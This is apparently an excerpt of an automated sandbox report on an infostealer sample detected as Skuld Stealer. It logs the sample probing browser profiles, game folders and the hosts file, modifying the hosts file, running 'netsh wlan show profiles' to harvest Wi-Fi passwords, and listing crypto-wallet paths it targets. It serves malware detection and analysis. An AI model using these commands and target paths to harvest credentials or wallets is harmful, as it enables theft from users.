                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\segmentation_platform VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\PEHPVXinsv VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Skuld Stealer
                      Source: Yara matchFile source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Public\AppData\Roaming\Electrum\walletsData
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host&lt;&gt;http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Ethereum\keystore
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Ethereum\keystore
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletseldb
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1440916143.000001A60DE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\Default\AppData\Roaming\Ethereum\keystore
                      Tries to harvest and steal WLAN passwords
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
